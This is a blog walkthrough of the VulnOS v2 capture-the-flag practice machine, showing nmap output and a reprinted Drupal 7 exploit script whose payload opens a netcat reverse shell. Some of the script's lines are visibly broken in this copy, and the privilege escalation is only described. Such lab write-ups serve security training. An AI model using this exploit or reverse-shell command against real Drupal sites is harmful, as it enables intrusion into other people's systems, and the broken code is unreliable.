Hack. Sleep. Repeat

View on GitHub

VulnOS are a series of vulnerable operating systems packed as virtual images to enhance penetration testing skills.

Your assignment is to pentest a company website, get root of the system and read the final flag aslo rated an OSCP like machine it really fun grab a copy here Download VulnOSv2 Here .


We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

└─$ nmap -sC -sV -oA nmap 
Starting Nmap 7.91 ( ) at 2021-05-23 20:53 EDT
Nmap scan report for
Host is up (0.00020s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.51 seconds

Not wasting to much of time we are checking the HTTP port first to see what is running on the web server very important.


Clicking on the website link redirect us to another page which seems to be running drupal 7 not going to explain how to exploit drupal 7 again i think have explaing through out my recent post.


Seems we know drupal 7 is vulnerable let get our reverse shell.


Running our exploit give us back a reverse and we spawn a TTY shell cool right?? if you are having problem on how to exploit the drupal 7 exploit code below;

#!/usr/bin/env python3

Written by Christian Mehlmauer

This script can be obtained from:

  - python3
  - python requests (pip install requests)

  - Install dependencies
  - modify the HOST variable in the script
  - run the code
  - win

import requests
import re


get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1337 >/tmp/f', 'name[#type]':'markup'}
post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
r =, data=post_params, params=get_params)

m ='<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
if m:
    found =
    get_params = {'q':'file/ajax/name/#value/' + found}
    post_params = {'form_build_id':found}
    r =, data=post_params, params=get_params)

Save in a file in python edit the host and the port to get a reverse shell it easy now let move to the next part.


We don’t have access to any of the user directory let check the version the server is running maybe it the way to root.

Privilege Escalation


Cool it running old version checking for available exploit.


Let download it to the target and compile it.


Now let run it.


We are root let get the flag.txt .


Box rooted and we are done.

Greeting From Muzec

Back To Home